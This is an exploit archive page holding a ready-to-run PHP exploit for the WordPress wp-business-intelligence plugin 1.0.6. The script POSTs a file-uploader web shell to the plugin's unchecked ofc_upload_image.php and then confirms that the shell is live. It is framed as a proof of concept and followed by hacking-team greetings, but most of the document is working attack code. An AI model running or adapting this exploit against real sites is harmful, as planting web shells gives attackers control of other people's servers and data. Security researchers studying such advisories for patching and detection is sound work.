what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress Business Intelligence 1.0.6 Shell Upload

WordPress Business Intelligence 1.0.6 Shell Upload
Posted Mar 28, 2014
Authored by Manish Tanwar

WordPress wp-business-intelligence plugin version 1.0.6 suffers from a remote shell upload vulnerability due to including ofc_upload_image.php.

tags | exploit, remote, shell, php
SHA-256 | cfc6ca57ddaae7ce436b3f1dd3b109d8d363bf14d5bbb4a97697b3c2cec8fbff

WordPress Business Intelligence 1.0.6 Shell Upload

Change Mirror Download
##############################################################################################
# Exploit Title : wordpress plugin "wp-business-intelligence" Remote code execution exploit
# Exploit Author : Manish Kishan Tanwar
# vendor Home : www.wpbusinessintelligence.com
# Version Affected: 1.0.6
# Discovered At : IndiShell LAB (indishell.in aka indian cyber army)
# Love to : zero cool,Team indishell,Hardeep Singh
##############################################################################################


////////////////////////////////////
POC Remote code Execution
////////////////////////////////////
this Plugin is vulnerable to remote code execution exploit because of ofc_upload_image.php file parameters ($_GET[ 'name' ] and $HTTP_RAW_POST_DATA)
there is no security check on these parameters and can be exploited by attacker

vulnerable link
http://127.0.0.1/wordpress/wp-content/plugins//wp-business-intelligence-lite//resources/open-flash-chart/php-ofc-library/ofc_upload_image.php

shell will be here
http://127.0.0.1/wordpress/wp-content/plugins//wp-business-intelligence-lite//resources/open-flash-chart/tmp-upload-images/shell.php

///////////////////////
/// exploit code ////
///////////////////////

<!--exploit code by Team INDISHELL(Manish Tanwar)-->
<?php

$web="http://127.0.0.1";
$shell="ica_shell.php";
$file="wp-content/plugins/wp-business-intelligence-lite/resources/open-flash-chart/php-ofc-library/ofc_upload_image.php?name=";
$up="/wp-content/plugins/wp-business-intelligence-lite/resources/open-flash-chart/tmp-upload-images/";
$upshell=$up.$shell;
$data = '<?php
echo "<body bgcolor=black>";
echo "<p><div align=center><font color=#ff9933 font size=6> <3 INDI</font><font color=white font size=6>SHELL</font><font color=green font size=6>=FTW <3 </font><p><form method=post enctype=multipart/form-data name=uploader >";
echo "<input type=file name=file size=50>&nbsp&nbsp&nbsp&nbsp<input type=submit name=sut value=Upload></form>";
if( isset($_POST[\'sut\']) )
{
if(@copy($_FILES[\'file\'][\'tmp_name\'], $_FILES[\'file\'][\'name\']))
{
echo "<font color=red size=2 face=\"comic sans ms\">upload done :D<br><br>";
}
else {
echo "<font color=red size=2 face=\"comic sans ms\">Upload failed :P<br>";
}
}
?>';
$link=$web;
$target = trim($link.$file.$shell);
$fshell=$link.$upshell;

$headers = array('User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1',
'Content-Type: text/plain');


$handle = curl_init();
curl_setopt($handle, CURLOPT_URL, $target);
curl_setopt($handle, CURLOPT_HTTPHEADER, $headers);
curl_setopt($handle, CURLOPT_POSTFIELDS, $data);
curl_setopt($handle, CURLOPT_RETURNTRANSFER, true);
$source = curl_exec($handle);
curl_close($handle);
if(!strpos($source, 'Undefined variable: HTTP_RAW_POST_DATA') && @fopen($fshell, 'r'))
{
echo "shell has been uploaded :D here is shell link<br><a href= ".$fshell.">".$fshell."</a>";
}
else
{
echo "sorry :( ";
}
?>
/////////////////////
end of exploit code
////////////////////


--==[[ Greetz To ]]==--
############################################################################################################################################
Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba ,Silent poison India,Magnum sniper,Atul Dwivedi ethicalnoob Indishell,Local root indishell,Irfninja indishell,Reborn India,L0rd Crus4d3r,cool toad,cool shavik,Hackuin,Alicks,Ebin V Thomas
Dinelson Amine,Th3 D3str0yer,SKSking,Mr. Trojan,rad paul,Godzila,mike waals,zoozoo,The creator,cyber warrior,Neo hacker ICA,Suriya Prakash
cyber gladiator,Cyber Ace, Golden boy INDIA,Ketan Singh,Yash,Aneesh Dogra,AR AR,saad abbasi,hero,Minhal Mehdi ,Raj bhai ji , Hacking queen
lovetherisk,brown suger and rest of TEAM INDISHELL
############################################################################################################################################
--==[[Love to]]==--
# My Father , my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi,Mohit, Ffe ^_^,Ashish,Shardhanand ,Budhaoo,Anju Gulia,Don(Deepika kaushik) and acche bacchi(Jagriti)

Login or Register to add favorites

File Archive:

December 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    2 Files
  • 2
    Dec 2nd
    0 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close